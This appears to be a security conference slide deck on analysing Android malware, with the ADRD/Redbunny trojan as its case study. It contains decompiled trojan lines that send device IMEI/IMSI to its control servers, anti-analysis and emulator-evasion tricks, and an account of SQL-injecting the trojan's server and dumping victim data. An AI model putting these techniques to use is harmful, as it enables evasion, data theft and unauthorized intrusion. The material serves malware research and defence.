Lost in translation

WTF is happening inside my Android Phone
8:30 PM


Contents

- Android System
- Static Analysis
- Dynamic Analysis
- Reversing
- Red Bunny
- Conclusion


Android architecture


Dalvik VM

- Register-based virtual machine
- Uses its own bytecode, not Java bytecode
- Runs on a slow CPU with little RAM
- Runs on an operating system without swap space
- Optimized for memory efficiency
- Dex class file format


Dex file format

Sections, in file order:

  header
  string_ids
  type_ids
  proto_ids
  field_ids
  method_ids
  class_defs
  data

The 0x70-byte header carries the size and offset of every other section, plus an Adler-32 checksum and a SHA-1 signature of the file; the id sections are tables that the bytecode in the data section references by index.
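As an added worked example (not code from the original deck), the Python below parses the 0x70-byte header described above from a constructed minimal dex file and recomputes the two integrity fields: the Adler-32 checksum over everything after offset 12, which Dalvik's dexopt checks before it accepts a file, and the SHA-1 signature over everything after offset 32. Any bytecode edit made to break a reversing tool has to fix both or the VM refuses the file. The field layout and constants are from the dex format specification; the sample file is constructed here (its map_off is 0, so it exercises header parsing only) and is not a real classes.dex.

```python
import hashlib
import struct
import zlib

# dex header layout (dex format spec). After the fixed fields, the header holds
# a (size, offset) pair for each section the slide lists, in this order.
HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
SECTIONS = ("string_ids", "type_ids", "proto_ids", "field_ids",
            "method_ids", "class_defs", "data")
# magic[8] checksum signature[20] file_size header_size endian_tag
# link_size link_off map_off, then (size, off) x 7
HEADER_FMT = "<8sI20sIIIIII" + "II" * len(SECTIONS)
assert struct.calcsize(HEADER_FMT) == HEADER_SIZE


def parse_dex_header(data: bytes) -> dict:
    """Decode the header, rejecting what a loader would reject (magic, endian tag)."""
    if len(data) < HEADER_SIZE:
        raise ValueError("shorter than a dex header")
    f = struct.unpack_from(HEADER_FMT, data, 0)
    magic, checksum, signature = f[0], f[1], f[2]
    file_size, header_size, endian_tag, _link_size, _link_off, map_off = f[3:9]
    if magic[:4] != b"dex\n" or magic[7:8] != b"\0":
        raise ValueError("bad magic %r" % magic)
    if endian_tag != ENDIAN_CONSTANT:
        raise ValueError("unexpected endian_tag 0x%08x" % endian_tag)
    hdr = {"version": magic[4:7].decode("ascii"), "checksum": checksum,
           "signature": signature.hex(), "file_size": file_size,
           "header_size": header_size, "map_off": map_off}
    pairs = f[9:]
    for i, name in enumerate(SECTIONS):
        hdr[name] = {"size": pairs[2 * i], "off": pairs[2 * i + 1]}
    return hdr


def is_dex(data: bytes) -> bool:
    try:
        parse_dex_header(data)
        return True
    except ValueError:
        return False


def verify_dex(data: bytes) -> dict:
    """Recompute the integrity fields: Adler-32 over everything after the checksum
    (offset 12) and SHA-1 over everything after the signature (offset 32)."""
    hdr = parse_dex_header(data)
    return {
        "checksum_ok": (zlib.adler32(data[12:]) & 0xFFFFFFFF) == hdr["checksum"],
        "signature_ok": hashlib.sha1(data[32:]).hexdigest() == hdr["signature"],
        "size_ok": hdr["file_size"] == len(data),
    }


def build_dex(payload: bytes) -> bytes:
    """Constructed minimal file: a header whose only non-empty section is `data`
    (holding `payload`). map_off is left 0, so this exercises header parsing and
    the integrity fields only; a VM would not load it."""
    file_size = HEADER_SIZE + len(payload)
    pairs = []
    for name in SECTIONS:
        pairs += [len(payload), HEADER_SIZE] if name == "data" else [0, 0]
    body = struct.pack(HEADER_FMT, b"dex\n035\0", 0, b"\0" * 20, file_size,
                       HEADER_SIZE, ENDIAN_CONSTANT, 0, 0, 0, *pairs) + payload
    body = body[:12] + hashlib.sha1(body[32:]).digest() + body[32:]   # signature first
    checksum = zlib.adler32(body[12:]) & 0xFFFFFFFF                   # checksum covers it
    return body[:8] + struct.pack("<I", checksum) + body[12:]


def flip_byte(data: bytes, offset: int) -> bytes:
    """Simulate a bytecode edit made without fixing up the header."""
    return data[:offset] + bytes([data[offset] ^ 0xFF]) + data[offset + 1:]


SAMPLE_DEX = build_dex(b"\x00" * 16)   # constructed, not a real classes.dex

if __name__ == "__main__":
    print(parse_dex_header(SAMPLE_DEX))
    print(verify_dex(SAMPLE_DEX))
    print(verify_dex(flip_byte(SAMPLE_DEX, HEADER_SIZE)))
```

Run it against a real classes.dex pulled out of an APK to see the section table filled in; a mismatch in checksum_ok on a file that still installs is a sign the sample was repackaged by a tool that rewrote the header.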


Analysis environment

Tools:

- Case-sensitive file system :D
- Android SDK
- Android NDK
- Android source code
- Eclipse
- Apktool, Dex2jar, JD-GUI
- Android Emulator


Example: from source to bytecode and back

  .java (source)  --compiler-->  .dex         (dump with dexdump)
  .dex            --dex2jar--->  .jar/.class  (decompile with JD-GUI to .java)
  .dex            --baksmali-->  .smali


Anti-analysis

Examples:

- Easy: use a.class and A.class as class names; on a case-insensitive file system one of the two files overwrites the other when the APK is unpacked, so the reverser never sees it.
- Medium: optimize/obfuscate the code with ProGuard.
- Hard: modify the bytecode so that the reversing tools break (making sure it still runs on Dalvik).

E.g. androguard-a1: insert an encoded value of type VALUE_ANNOTATION. The parser only knew the types below and aborted on anything else:

    if self.__value_type >= VALUE_SHORT :
        ...
    elif self.__value_type == VALUE_ARRAY :
        ...
    elif self.__value_type == VALUE_BYTE :
        ...
    elif self.__value_type == VALUE_NULL :
        ...
    elif self.__value_type == VALUE_BOOLEAN :
        ...
    else :
        raise("oops")
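As an added example that is not part of the original deck or of androguard, the Python below decodes the dex encoded_value structure the excerpt above handles only partially. It covers every value_type in the dex format specification (VALUE_ANNOTATION and VALUE_ARRAY recursively, sized integers sign- or zero-extended, floats padded on the low-order side) and fails with an offset instead of an unqualified raise, which is what keeps a tool alive when a sample plants an unexpected type. The constants are from the dex specification; the sample bytes are constructed here and come from no real APK.

```python
import struct
from typing import Any, Tuple

# value_type codes from the dex format spec (low 5 bits of the first byte;
# the high 3 bits are value_arg).
VALUE_BYTE, VALUE_SHORT, VALUE_CHAR, VALUE_INT, VALUE_LONG = 0x00, 0x02, 0x03, 0x04, 0x06
VALUE_FLOAT, VALUE_DOUBLE = 0x10, 0x11
VALUE_METHOD_TYPE, VALUE_METHOD_HANDLE, VALUE_STRING = 0x15, 0x16, 0x17
VALUE_TYPE, VALUE_FIELD, VALUE_METHOD, VALUE_ENUM = 0x18, 0x19, 0x1A, 0x1B
VALUE_ARRAY, VALUE_ANNOTATION, VALUE_NULL, VALUE_BOOLEAN = 0x1C, 0x1D, 0x1E, 0x1F
SIGNED = {VALUE_SHORT: "short", VALUE_INT: "int", VALUE_LONG: "long"}
UNSIGNED = {VALUE_CHAR: "char", VALUE_METHOD_TYPE: "method_type",
            VALUE_METHOD_HANDLE: "method_handle", VALUE_STRING: "string",
            VALUE_TYPE: "type", VALUE_FIELD: "field", VALUE_METHOD: "method",
            VALUE_ENUM: "enum"}


def read_uleb128(buf: bytes, pos: int) -> Tuple[int, int]:
    result = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7
        if shift >= 35:                  # dex uleb128 is at most 5 bytes
            raise ValueError("uleb128 too long at offset %d" % pos)


def decode_value(buf: bytes, pos: int = 0) -> Tuple[Tuple[str, Any], int]:
    """Decode one encoded_value at pos -> ((kind, value), next_pos). Every
    value_type in the spec is handled, so an attacker-chosen type cannot abort
    the parse; only the reserved codes raise."""
    header = buf[pos]
    pos += 1
    vtype, varg = header & 0x1F, header >> 5
    size = varg + 1                      # payload length for the sized types
    if vtype == VALUE_BYTE:
        return ("byte", struct.unpack_from("<b", buf, pos)[0]), pos + 1
    if vtype in SIGNED:                  # sign-extended little-endian
        return (SIGNED[vtype], int.from_bytes(buf[pos:pos + size], "little", signed=True)), pos + size
    if vtype in UNSIGNED:                # zero-extended little-endian (indexes into the id tables)
        return (UNSIGNED[vtype], int.from_bytes(buf[pos:pos + size], "little")), pos + size
    if vtype in (VALUE_FLOAT, VALUE_DOUBLE):
        width, fmt = (4, "<f") if vtype == VALUE_FLOAT else (8, "<d")
        raw = b"\0" * (width - size) + buf[pos:pos + size]   # stored bytes are the high-order ones
        return (("float" if width == 4 else "double"), struct.unpack(fmt, raw)[0]), pos + size
    if vtype == VALUE_ARRAY:             # encoded_array: uleb128 count, then values
        count, pos = read_uleb128(buf, pos)
        items = []
        for _ in range(count):
            item, pos = decode_value(buf, pos)
            items.append(item)
        return ("array", items), pos
    if vtype == VALUE_ANNOTATION:        # encoded_annotation: type_idx, count, (name_idx, value)*
        type_idx, pos = read_uleb128(buf, pos)
        count, pos = read_uleb128(buf, pos)
        elements = {}
        for _ in range(count):
            name_idx, pos = read_uleb128(buf, pos)
            elements[name_idx], pos = decode_value(buf, pos)
        return ("annotation", {"type_idx": type_idx, "elements": elements}), pos
    if vtype == VALUE_NULL:
        return ("null", None), pos
    if vtype == VALUE_BOOLEAN:           # the value lives in value_arg, no payload
        return ("boolean", bool(varg)), pos
    raise ValueError("reserved value_type 0x%02x at offset %d" % (vtype, pos - 1))


def safe_decode(buf: bytes) -> dict:
    """What a reversing tool should do instead of raise("oops"): report the
    offset it choked on and let the rest of the analysis continue."""
    try:
        value, end = decode_value(buf, 0)
        return {"value": value, "consumed": end, "error": None}
    except (ValueError, IndexError) as exc:
        return {"value": None, "consumed": 0, "error": str(exc)}


# Constructed static_values array: int 0x1234, string_ids[5], an annotation
# (type_ids[3], one element name string_ids[7] = true), null, float 1.0.
SAMPLE = bytes([0x1C, 0x05,                    # VALUE_ARRAY, 5 items
                0x24, 0x34, 0x12,              # VALUE_INT, size 2
                0x17, 0x05,                    # VALUE_STRING, index 5
                0x1D, 0x03, 0x01, 0x07, 0x3F,  # VALUE_ANNOTATION with a boolean true
                0x1E,                          # VALUE_NULL
                0x30, 0x80, 0x3F])             # VALUE_FLOAT, size 2 -> 0x3F800000

if __name__ == "__main__":
    print(safe_decode(SAMPLE))
    print(safe_decode(bytes([0x05, 0x00])))    # reserved type: reported, not a crash
```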


Dynamic analysis

Basic:

- Create an Android Virtual Device: $ android (SDK)
- $ emulator -port 5560 @virtual-device -tcpdump capture.pcap
- $ adb install app.apk
- $ adb shell monkey -v -p package.app 700
- $ adb shell logcat -d && adb shell logcat -b events -d (also -b radio)
- $ adb shell '/data/busybox find / -type f -exec /data/busybox md5sum

Take the md5sum listing before and after exercising the app and diff the two: new or changed files under /data are what the sample dropped.


Make it more real

- Simulate phone events through the emulator console (TCP port 5554 for the first emulator; with -port 5560 as above, connect to 5560 instead):

Send an SMS:

  $ echo sms send +34656566789 test | nc localhost 5554

  The radio log (logcat -b radio) shows the SMS-DELIVER PDU the emulated modem hands to the RIL:

  D/AT    ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c

Simulate calls:

  $ echo gsm call +34656566789 | nc localhost 5554
  $ echo gsm accept +34656566789 | nc localhost 5554
  $ echo gsm cancel +34656566789 | nc localhost 5554

Change GPS coordinates:

  $ echo geo fix -82.411629 28.054553 | nc localhost 5554
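The AT< line above is the SMS-DELIVER PDU the emulated modem delivers for an sms console command. As an added example (not from the original deck), the Python below decodes such a PDU: SMSC length, first octet, originating address in nibble-swapped BCD, protocol id, data coding scheme, service-centre timestamp and the GSM 7-bit packed user data. Applied to the captured line it gives sender +34656566789, timestamp 2011-02-27 20:47:04 +01:00 and the four-character body caca, which is exactly what an SMS-intercepting sample receives and what to look for in its logs and traffic. The alphabet table and field layout follow GSM 03.38 and 3GPP 23.040; the code assumes the general data-coding group (DCS high bits 00) and a single PDU without a user-data header.

```python
# GSM 03.38 default alphabet: index == 7-bit code. Letters and digits coincide with ASCII.
GSM7 = ("@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
        "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà")

# Radio log line from the slide (logcat -b radio), hex part only.
CAPTURED_PDU = "00200b914356566687f900001120720274404004e3f0380c"


def semi_octets(raw: bytes, ndigits: int) -> str:
    """BCD digits are stored nibble-swapped: 0x43 0x56 -> '3465'."""
    digits = []
    for b in raw:
        digits.append(format(b & 0x0F, "x"))
        digits.append(format(b >> 4, "x"))
    return "".join(digits[:ndigits])


def unpack_7bit(data: bytes, septets: int) -> str:
    """Unpack GSM 7-bit septets (LSB first across octet boundaries)."""
    bits = nbits = 0
    out = []
    for b in data:
        bits |= b << nbits
        nbits += 8
        while nbits >= 7 and len(out) < septets:
            out.append(GSM7[bits & 0x7F])
            bits >>= 7
            nbits -= 7
    return "".join(out)


def decode_sms_deliver(hexpdu: str) -> dict:
    """Parse an SMS-DELIVER TPDU as handed to the RIL in a +CMT."""
    pdu = bytes.fromhex(hexpdu)
    pos = 1 + pdu[0]                        # skip SMSC address (length 0 on the emulator)
    first = pdu[pos]
    pos += 1
    if first & 0x03 != 0x00:
        raise ValueError("not an SMS-DELIVER (MTI=%d)" % (first & 0x03))
    oa_len, toa = pdu[pos], pdu[pos + 1]
    pos += 2
    oa_bytes = (oa_len + 1) // 2
    sender = semi_octets(pdu[pos:pos + oa_bytes], oa_len)
    pos += oa_bytes
    if toa & 0x70 == 0x10:                  # type-of-number: international
        sender = "+" + sender
    pid, dcs = pdu[pos], pdu[pos + 1]
    pos += 2
    ts = semi_octets(pdu[pos:pos + 7], 14)  # YYMMDDhhmmss + timezone
    tzb = pdu[pos + 6]                      # timezone in quarter hours, sign in bit 3
    pos += 7
    quarters = ((tzb & 0x07) * 10 + (tzb >> 4)) * (-1 if tzb & 0x08 else 1)
    timestamp = "20%s-%s-%s %s:%s:%s %s%02d:%02d" % (
        ts[0:2], ts[2:4], ts[4:6], ts[6:8], ts[8:10], ts[10:12],
        "+" if quarters >= 0 else "-", abs(quarters) // 4, (abs(quarters) % 4) * 15)
    udl = pdu[pos]
    pos += 1
    if dcs & 0x0C == 0x00:                  # GSM 7-bit default alphabet, udl counts septets
        text = unpack_7bit(pdu[pos:], udl)
    elif dcs & 0x0C == 0x08:                # UCS-2, udl counts bytes
        text = pdu[pos:pos + udl].decode("utf-16-be")
    else:                                   # 8-bit binary (e.g. WAP push): keep hex
        text = pdu[pos:pos + udl].hex()
    return {"sender": sender, "pid": pid, "dcs": dcs, "timestamp": timestamp, "text": text}


if __name__ == "__main__":
    print(decode_sms_deliver(CAPTURED_PDU))
```

The same function applies to PDUs written by a sample's own SMS code (the later update APK on this deck sends SMS), which is why the 8-bit and UCS-2 branches are kept even though the emulator console only produces 7-bit text.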


Dynamic analysis

Advanced:

- Build your own system image and modify the framework Java classes to log the program flow, e.g. frameworks/base/core/java/android/os/Process.java.


Compiling Android kernel modules

  $ git clone git://android.git.kernel.org/kernel/common
  $ git branch -a
  $ git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
  $ adb pull /proc/config.gz ./; gunzip config.gz; mv config .config

Edit .config and add CONFIG_MODULES=y (module loading is disabled by default in the emulator kernel). Build the kernel with an ARM cross toolchain and boot the emulator on the resulting arch/arm/boot/zImage:

  $ emulator -avd armv5y -kernel /tmp/zImage

(android.git.kernel.org no longer exists; the goldfish kernel tree is now served from android.googlesource.com as kernel/goldfish.)


System-call hooking

  $ grep sys_call_table System.map

sys_call_table is not an exported symbol, so a hooking module takes its address from the System.map of the kernel it was built against and patches the entries it wants to intercept (open, read, write ...). The address changes with every kernel build, which is one more reason to build the emulator kernel yourself.


Anti-VM

- Detecting the emulator is very easy:

DEVICE_ID:

  String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
  boolean emulator = TextUtils.isEmpty(id);

Solution: set secure -> android_id in /data/data/com.android.providers.settings/databases/settings.db (the emulator image has no value there, which is what the isEmpty() check keys on).

IMSI:

  TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
  String imsi = manager.getSubscriberId(); (hard-coded on the emulator: the IMEI answer is all zeros and the IMSI answer is a fixed constant)

Solution: patch the emulator binary (the canned replies sit next to the "+CGSN" and "+CIMI" AT command strings) or the emulator source code (external/qemu/telephony/android_modem.c).
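The first fix above as an added example (not code from the original deck): write secure.android_id into a pulled settings.db with Python's sqlite3, then re-run the same emptiness check the slide quotes. The `secure` table is created with the columns the settings provider uses; the database file here is constructed in a temporary location, and generating the id as 64 random bits rendered as 16 lowercase hex digits (the format a real device returns) is an assumption about what an app will accept.

```python
import os
import secrets
import sqlite3
import tempfile
from typing import Optional

HEX = set("0123456789abcdef")


def make_constructed_settings_db(path: str) -> None:
    """Constructed stand-in for settings.db: the `secure` table as the settings
    provider creates it and no android_id row, which is what an emulator image
    reports as empty."""
    con = sqlite3.connect(path)
    with con:
        con.execute("CREATE TABLE secure (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                    "name TEXT UNIQUE ON CONFLICT REPLACE, value TEXT)")
    con.close()


def get_android_id(db_path: str) -> Optional[str]:
    con = sqlite3.connect(db_path)
    try:
        row = con.execute("SELECT value FROM secure WHERE name = 'android_id'").fetchone()
    finally:
        con.close()
    return row[0] if row else None


def set_android_id(db_path: str, new_id: Optional[str] = None) -> str:
    """Give the pulled database a device-like ANDROID_ID (assumed format: 64
    random bits as 16 lowercase hex digits). Returns the value written."""
    new_id = new_id or secrets.token_hex(8)
    if len(new_id) != 16 or set(new_id) - HEX:
        raise ValueError("android_id must be 16 lowercase hex digits")
    con = sqlite3.connect(db_path)
    with con:
        con.execute("INSERT OR REPLACE INTO secure (name, value) VALUES ('android_id', ?)",
                    (new_id,))
    con.close()
    return new_id


def looks_like_emulator(android_id: Optional[str]) -> bool:
    """The check quoted on the slide: TextUtils.isEmpty(id)."""
    return not android_id


def demo() -> dict:
    """Round trip on a temporary constructed database: flagged before, clean after."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    try:
        make_constructed_settings_db(path)
        before = get_android_id(path)
        written = set_android_id(path)
        after = get_android_id(path)
    finally:
        os.remove(path)
    return {"before": before, "after": after, "written": written,
            "flagged_before": looks_like_emulator(before),
            "flagged_after": looks_like_emulator(after)}


if __name__ == "__main__":
    print(demo())
```

Against a real AVD: adb pull the database, run set_android_id on it, adb push it back and restart the emulator so the settings provider re-reads it. The IMEI/IMSI replies on the same slide do not live in this database; they come from the emulated modem and need the binary or source patch described above.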


More Anti-VM

- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException (the provider does not exist on the emulator)
- Detect ADB: its process, its network port, debugging enabled...
- /proc/cpuinfo -> Hardware : Goldfish
- vibrator.vibrate(milliseconds) and use a SensorListener: the sensor data does not change (thanks Ehooo)
- QEMU-specific detection (Google)

Solution: patch the emulator, QEMU, system hooking...


Alternatives to the Android emulator

- http://www.android-x86.org/ (runs under VMware)
- Use a real phone... slower


Attack vectors

- Alternative markets, repackaged applications
- SMS and MMS vulnerabilities (fuzzing!)
- Wireless and Bluetooth drivers
- NFC
- System components: WebKit, the sound library, the kernel


Third-party software

Source: http://android.git.kernel.org/


ADRD aka Redbunny

- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)

- "[...] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. [...]"

- Jaime Blasco and Pablo Rincón were working together analyzing this malware on Feb 2, 2011:
  * Name: com.beautyfullivewallpaper
  * Date: Feb. 2, 2011, 1:49 p.m.

- Also known as HongTouTou


Detection

- Permission list:
  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS..

- Cipher module/library calls (DES), as callee / caller class / caller method:
  * init    Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt

- Function calls that retrieve the IMSI/IMEI codes:
  * IMEI:  getDeviceId       Lcom/xxx/yyy/MyService;    onCreate
  * IMSI:  getSubscriberId   Lcom/xxx/yyy/MyService;    onCreate

- HTTP requests (GET and POST):
  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;
  * adrd.xiaxiab.com

  POST /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af


Detection

- Sends HTTP requests through a proxy (10.0.0.172:80 is the CMWAP/UNIWAP operator proxy):
  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);

- Services:
  * com.xxx.yyy.MyService
  * .beauty.Beauty

- Intents:
  * android.intent.action.BOOT_COMPLETED -> starts at system boot
  * android.intent.action.PHONE_STATE
  * android.net.conn.CONNECTIVITY_CHANGE


Analysis I

Service module (MyService):

  1. Sets the preferred APN, runs every 12 hours and looks for a specific APN network: "CMWAP" || "UNIWAP"
  2. Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types)
  3. Cipher data module: public static String encrypt/decrypt
       Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
  4. Sends data to adrd.taxuan.net/index.aspx?im=%s:
       + IMEI
       + IMSI
       + Netway (preferred APN)
       + iversion
       + oversion
  5. Loop:
       + Decrypt response
       + switch(cmd):
           0 -> do nothing
           1 -> adad.StartGo()
           2 -> ParseO()
           3 -> UpdateHelper()
  6. The handlers:
       adad.StartGo(): sends http://adrd.xiaxiab.com/pic.aspx?im= + encrypt(IMEI+IMSI ...) and parses the big list of URLs/referers, e.g. B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1
         BBBB.Go() retrieves search lists from wap.baidu.com
         FixUrls() sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS
         Sends log data to the control servers
       ParseO(): parses the server response (number, flags, tags ..): T213607170863|12345|+    -10086+    abc   -597|   [   '
       UpdateHelper(): installs the update APK


Analysis II

- Following the encryption routines, the DES key is found: this.kk = "48734154";

- UpdateHelper class:

    public class UpdateHelper
    {
      private static String savefilepath = "/myupdate.apk";
      private Context ct;
      private int netway;

- Monetization: visits to the content (Baidu), bandwidth consumption (China Mobile && Unicom) and SMS charges.

- Server URLs (there are more):
    http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
    http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA

- We want to know more!!


Control servers

- adrd.xiaxiab.com from a bird's-eye view:
  * Microsoft-IIS/6.0
  * Debug enabled (displaying .NET errors and backtraces)
  * Hidden paths to the .NET/aspx application
  * Everything is in Chinese! (WTF!?!)

- Possible attack vectors:
  * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)


Control servers

- First results:
  * Exceptions in Chinese. Google Translate is your friend.
  * Errors at .NET (it didn't generate any HTML list/table or view to use for displaying data).
  * We got a successful SQL injection after the last ciphered parameter :D
  * User without admin privileges.
  * Permissions to run backups + shared resources = timeout.
  * Other possibilities:
    + 1: Create a temporary DB with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (also, the language didn't help).
    + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the HTTP logs, and it's not usual to log all the DB queries, for performance reasons).


Database information

- The whole schema obtained: list of tables, fields, types, stored procedures
- IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx!
  * Parameters:
    @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
  * Stored procedure body:
    --if (@netwap=2)
    select 'T-1|T11'
    --select 'T3http://adrd.xiaxiab.com/down.aspx'
    --select 'T213607170863|12345|+        -10086+     abc     -597|     [     '
    --else
    --select 'T013607170863'
  * It looks like they were using netwap (derived from the mobile operator) as the criterion for which command to send
  * TX, where X seems to be a command type
  * 13607170863 is a phone number located in Wuhan
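As an added example (not the authors' code and not recovered from the malware), the Python below parses decrypted index.aspx responses the way the slides describe them: a T prefix, one command digit dispatched by the switch(cmd) in Analysis I, and a payload whose layout is read off the samples on this slide and the ParseO() sample. The T3 payload being the update URL, the "|" field separator and the "B#1#963a_w1|url" entry layout from pic.aspx are therefore assumptions; "T-1|T11" does not fit the pattern and is reported as unknown rather than dispatched. Decryption is left out (DES/CBC/PKCS5 with the key from Analysis II needs a DES library); this is the step a fake C2 or an IOC extractor runs on the plaintext.

```python
from typing import Dict, List

# switch(cmd) from the response loop in Analysis I
COMMANDS = {0: "do nothing", 1: "adad.StartGo()", 2: "ParseO()", 3: "UpdateHelper()"}

# Constructed list made of the literals visible on the slides (stored procedure
# selects and the ParseO() sample), i.e. the plaintext after DES decryption.
SAMPLE_RESPONSES = [
    "T013607170863",
    "T213607170863|12345|+    -10086+    abc   -597|   [   '",
    "T3http://adrd.xiaxiab.com/down.aspx",
    "T-1|T11",
]


def parse_command(response: str) -> Dict[str, object]:
    """'T' + one command digit + payload (layout assumed from the samples).
    Anything that does not fit is reported as unknown, never dispatched."""
    if len(response) < 2 or response[0] != "T" or not response[1].isdigit():
        return {"cmd": None, "action": "unknown", "payload": response}
    cmd, payload = int(response[1]), response[2:]
    result: Dict[str, object] = {"cmd": cmd, "action": COMMANDS.get(cmd, "unknown"),
                                 "payload": payload}
    if cmd == 2:
        # ParseO(): '|'-separated fields (number, flags, tags ...); the padding
        # spaces seen on the slide are stripped
        result["fields"] = [f.strip() for f in payload.split("|")]
    elif cmd == 3:
        result["update_url"] = payload     # UpdateHelper() downloads and installs this APK
    return result


def update_urls(responses: List[str]) -> List[str]:
    """Every UpdateHelper URL in a batch: the first thing to block or sinkhole."""
    return [str(r["update_url"]) for r in map(parse_command, responses) if r["cmd"] == 3]


def parse_url_list_entry(entry: str) -> Dict[str, object]:
    """One pic.aspx list entry, 'B#1#963a_w1|http://...': the '#'-separated
    prefix is kept as opaque tags (their meaning is not on the slides)."""
    tags, _, url = entry.partition("|")
    return {"tags": tags.split("#"), "url": url}


if __name__ == "__main__":
    for r in SAMPLE_RESPONSES:
        print(parse_command(r))
    print(update_urls(SAMPLE_RESPONSES))
    print(parse_url_list_entry("B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1"))
```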


Database schema (t_... marks a table name that did not survive the slide export)

  t_baiduHourPercent: autoid, mHour, mPercent
  t_baidukeyword: keyword, viewcount
  t_baidukeywordflash: keyword
  t_baiduOrtherKey: keyword, viewcount
  t_baidupwd: id, way, username, pwd
  t_baiduwayname: way, wayname
  t_keywordResult: id, keyword, link, head, flag
  t_androidtemplog: id, imsi, way, result, createtime
  t_keywordResult20100601: id, keyword, link, head, flag
  t_keywordResult20101108: id, keyword, link, head, flag
  t_baiduHourPercent20101012: autoid, mHour, mPercent
  t_androidtemplog_backup: id, imsi, way, result, createtime
  t_androidtemperrlog: id, compresslog, decompresslog, createtime
  t_androidtemplog_backup201101: id, imsi, way, result, createtime
  t_android...: id, imei, imsi, logs, ip, createtime, netway
  t_android...: ..., ..., ..., ..., createtime
  t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
  t_...: way, maxClick, minClick, leaveTotalClick, leaveEffectClick
  t_..._wap_20100323: keyword, createtime
  t_..._wap_20100722...: keyword, createtime
  t_...: myear, mmonth, mday, mhour, total
  t_...: way, flag
  t_...: keyword, flag
  t_..._wap: keyword, flag
  t_..._wap_back...: keyword, flag
  t_..._wap_back...: keyword, flag
  t_...: flag
  t_...: keyword, createtime
  t_..._wap: keyword, createtime
  t_...: keyword, createtime
  t_..._wap: keyword, createtime


Myupdate.apk

- It uses the main package of the ADRD family, xxx.yyy.
- The update requests additional permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS..
- Looks like a Google Reader app
- It adds a local SQLite DB (keyword storage):
    go_g1_sms: id, keyword, type, flag
    go_g2_sms: id, keyword, keyword2
- SMSObserver:
  * Replaces keywords in SMSs
  * Sends SMSs!


Samples

  Package name                              Md5                                Adrd Ver        IVer
  com.beautyfullivewallpaper                4556a687a2845bf4dfac62c594938cf3   adrd.zt.cw.1    6
  com.yodesoft.yohandcar                    6783cee889fa64df68af58a56ff6e362   adrd.zt.2       6
  com.binaryloft.live.winter                aa5216da617839e818d83d8185da42b0   adrd.zt.jtj.2   6
  com.magicwach.rdefense                    839c37f3a2c8d31561d28f619a2a712e   adrd.zt.cw.3    6
  com.tat.livewallpaper.dandelion           5192ad05597e7a148f642be43f6441f6   adrd.zt.cw.4    6
  com.classicnerds.livewallpaper.HK         b72724d8fc0f633194dcc3bd28eec026   adrd.zt.cw.5    7
  fishnoodle.night_city                     a01ba26a34e55f71873782348ff5e074   adrd.zt.dxm.6   7
  com.appspot.swisscodemonkeys.steam        cdfca19bf212adf3292e4fe677fe46a6   adrd.zt.cw.7    7
  kr.mobilesoft.yxplayer                    e3cc6c7af0d83fe322116254c01cf720   adrd.zt.cw.8    7
  com.labgency.wallpapers.waves             7d764347a0b0c9d11160d7a7684bf02b   adrd.zt.dxm.8   7
  com.laucass.andromax                      627f41c8f8e7ab007641c4a0c1d8ce1b   adrd.zt.cw.9    7
  com.digitalchocolate.androidrollergapp    71c0a67daa544450d7c620a48cc059b0   drd.zt.cw.12    7
  proscio.wallpaper.shamroc                 e09782d35d72a769dc7454adb6d8e2e9   adrd.zt.cw.15   7
  com.tt.yy                                 f2596f8f3c52381318f62d1ab161c284   ??              ??


Infections

Geolocation (map of infected devices)


Infections

Infections by operator (+20K different IMSIs)

Other affected operators:
  Far EasTone
  Peoples Telephone Company
  Hutchison 3G
  PCCW Mobile Sunday
  Hong Kong Telecom
  SmarTone Mobile
